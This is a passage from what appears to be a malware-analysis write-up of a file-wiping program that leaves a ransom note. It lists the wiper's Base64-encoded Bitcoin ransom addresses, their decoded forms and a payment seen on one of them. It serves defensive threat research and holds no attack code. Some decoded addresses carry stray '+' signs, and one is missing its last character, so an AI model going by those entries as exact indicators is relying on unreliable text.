<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">After file wiping, it creates the .html file with a ransom note. The content of this file is as follows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="505" src="https://lh6.googleusercontent.com/cTgmAcer7FySG3n46Hqhhh7DA1kJZ3xZ048cJUbPOfAwmyUdfB4YV9U-7aaxZyTgg6YAo_5_ttuethcmvGd2uTjKPGDhG0KEobHw2voyLwLewHMZlTDrNNkKH9zCpwH-qnCWk_h5" style="border: none;" width="605" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The Bitcoin account is also mentioned:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="279" src="https://lh5.googleusercontent.com/snw-l_CNEHtE2TtFU2MP1HspuMwE2Qmc1s3pGACAs9-TfV65ewdEMXboUxhn6fjqwcsCdVuAuD6GIbf3NSh32sSfebjd9JGCEZORgSIwbj6h52PyzIv2-QBVO4fzZCA1e9JSz89P" style="border: none;" width="607" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It is said that the Bitcoin account is generated individually. During the dynamic analysis, it was discovered that the wiper has a list of Bitcoin addresses. One of the addresses is chosen randomly for each victim. This list is located in the '.data' section and </span><span style="background-color: white; color: #262626; font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">Base64 </span><span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">encoded.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUtqQlV2TjRHZmlwaTNiR211QVBEY0pFcXg0OE54NW00aQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTdCSlI5OEczYnB5Y2dvaWNWVldITG10MW43andDM0hUaw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTRYaHdWM2lCTWNMRThxVVJ0azRxMlRSNTNvTVNOZ1pIWg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTd6R2NxS2ppODRzWWc2WHhlZkxGdmtab3VITUtRZlNyYg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUxSTUZLcFNLaHJvYlZKYTF1bzVWN3BuWW5FVjdTOGhaRQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTM1dWcxZGlFa2FHbVRhSGg0dlAxa0xMZ3N3UlZtWmJLdw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MU5YWmc1OUJ6V1NleHREdXZzcGJDSjZOUnFIVDRUN2piTQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTlzZDg2ZHVUaDd2a1lVd01ESmlyUDFGNTEzVHZ3bzdmdg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUpqa2JmakRzaTFVcXFCZ2NHdHNNZFplZkZNY1Z1a3dWYQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MVB5WjZ5UWRuTXBWbjVvOVNmZGFQRXpBSDEzN1lzOUtIbg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUNRamFLSmQ4WUt1dnpqaGp0Q0t5OFFHUDlDWTRYNlh5Yw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUoxTUJiZ05vQjlwSlhoelpzNkR0bnBnSFB6YWVxQ3gyeA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MU1SdnI5YkRCS2I4TGNjdGViTTdScVhpOFhpaXYzNWZVdA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MURiQVhmRlkxc0NxZWE0V2UyOHRkOGUzRlVHaDFNdktiVA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTZDcTJNcFgxTERNWEVhM2VHdVEzRkdXQzNrTm9vd3pqZw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUpLTjF1ejZCYVdVd2Z0b1BTYWg1Um52RDlhVGppbWtaZQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUh1Z05OcjcyTUhBZDUzUzN5Z0h3SldBeGk2NTV0cEJxYQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTd2SDFZVDYzalJUYXZOUVJHR3NQNDl4anpadFpzeE5SRg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUZaaFRCTFpNUlFtczVxOGg0aUhaQVlkRXBncjZkaHB3Mg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUVKbllGbU5tVmVvenJGakJ5elFtV0JNYkNiNnNqOEtOaA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTNpdjZhVWM4b0VCZzlSOU1GUkV3dlRSVGplY3kyVEJYWQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUUzczZTM1lVZmFkWlAyN1p0d3RQRU5iU3pWNE1yM2t2Ng==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTh0bm1EU3ZMYjVzeHlWYWlkM0s5WWRFVmZUOVRIVE1mbw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUVoNEMxUm9kb2lGRU0zRzdab3pMb2pOU05HUExoOFhvMQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUZrQ1prbTc0ekVRM1VOQ1NjQndVenV4WWJiV0gxNWg1eg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTlQRUtUQ28xSjJRaDFqQ0h4bnNYajRyQUF2dm5veXJEQg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUZ0NDVhVzhiM0hlb0pHZTlObUp6OEgzSHU3TnB3ZEh6WQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MURBa1YzbjNRWlp0WVpBbUdERkNReWFoN1lUQ1JETm1IMQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTljd3JqVjJGTTNmdzRCcUJ3bnNCaTloRHdNd1ViSnl5OA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTNBc2RYa2I3TEcyYUp6cm9adFpwQ3NxYmh5aFpncnB3Yw==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTY3a1ZQMWN0bnc0OGVFTTk3Wkhid1RUTEVVYUVvSHRmTg==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUE4UngxUEh5WXE0eEpOU29Ebmt1YTlyc1FhVnVMN0tTVQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUQ4VEUyTFJEalJVM2I2MTQzTFI0R1hXSmJ2aG56b2lLdQ==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUdKZmRpdTJBRVFBOU5zRnlLeXB4N1lNZm9IRlppN0t6Ug==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MUhrMnVBd29XNno1UWRydHNzS1hCUTlkNlZUdm44blBEOA==</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MTlENGlVcVlZZDF5M0huMjk1eWZzYWNYVXlrV3dxWmFvdg==</span></div>
<b style="font-weight: normal;"><br /></b><span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">After decoding the list contains the following Bitcoin addresses:</span><br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: -4.5pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="330"></col><col width="345"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1KjBUvN4Gfipi3bGmuAPDcJEqx48Nx5m4i</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">17BJR98G3bpycgoicVVWHLmt1n7jwC3HTk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">14XhwV3iBMcLE8qURtk4q2TR53oMSNgZHZ</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+17zGcqKji84sYg6XxefLFvkZouHMKQfSrb</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1LRMFKpSKhrobVJa1uo5V7pnYnEV7S8hZE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">135ug1diEkaGmTaHh4vP1kLLgswRVmZbKw</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1NXZg59BzWSextDuvspbCJ6NRqHT4T7jbM</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19sd86duTh7vkYUwMDJirP1F513Tvwo7f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1JjkbfjDsi1UqqBgcGtsMdZefFMcVukwVa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1PyZ6yQdnMpVn5o9SfdaPEzAH137Ys9KHn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1J1MBbgNoB9pJXhzZs6DtnpgHPzaeqCx2x</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1MRvr9bDBKb8LcctebM7RqXi8Xiiv35fUt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1DbAXfFY1sCqea4We28td8e3FUGh1MvKbT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">16Cq2MpX1LDMXEa3eGuQ3FGWC3kNoowzjg</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1JKN1uz6BaWUwftoPSah5RnvD9aTjimkZe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1FkCZkm74zEQ3UNCScBwUzuxYbbWH15h5z</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1HugNNr72MHAd53S3ygHwJWAxi655tpBqa</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">17vH1YT63jRTavNQRGGsP49xjzZtZsxNRF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1FZhTBLZMRQms5q8h4iHZAYdEpgr6dhpw2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1EJnYFmNmVeozrFjByzQmWBMbCb6sj8KNh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">13iv6aUc8oEBg9R9MFREwvTRTjecy2TBXY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1E3s6S3YUfadZP27ZtwtPENbSzV4Mr3kv6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">18tnmDSvLb5sxyVaid3K9YdEVfT9THTMfo</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Eh4C1RodoiFEM3G7ZozLojNSNGPLh8Xo1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19PEKTCo1J2Qh1jCHxnsXj4rAAvvnoyrDB</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Ft45aW8b3HeoJGe9NmJz8H3Hu7NpwdHzY</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1DAkV3n3QZZtYZAmGDFCQyah7YTCRDNmH1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+19cwrjV2FM3fw4BqBwnsBi9hDwMwUbJyy8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">13AsdXkb7LG2aJzroZtZpCsqbhyhZgrpwc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">167kVP1ctnw48eEM97ZHbwTTLEUaEoHtfN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1A8Rx1PHyYq4xJNSoDnkua9rsQaVuL7KSU</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1D8TE2LRDjRU3b6143LR4GXWJbvhnzoiKu</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">+1GJfdiu2AEQA9NsFyKypx7YMfoHFZi7KzR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1Hk2uAwoW6z5QdrtssKXBQ9d6VTvn8nPD8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19D4iUqYYd1y3Hn295yfsacXUykWwqZaov</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">For example, the first BTC address in the list received </span><a href="https://www.blockchain.com/btc/address/1KjBUvN4Gfipi3bGmuAPDcJEqx48Nx5m4i" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">0.150389 BTC ($1500)</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> on August 1, 2019.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
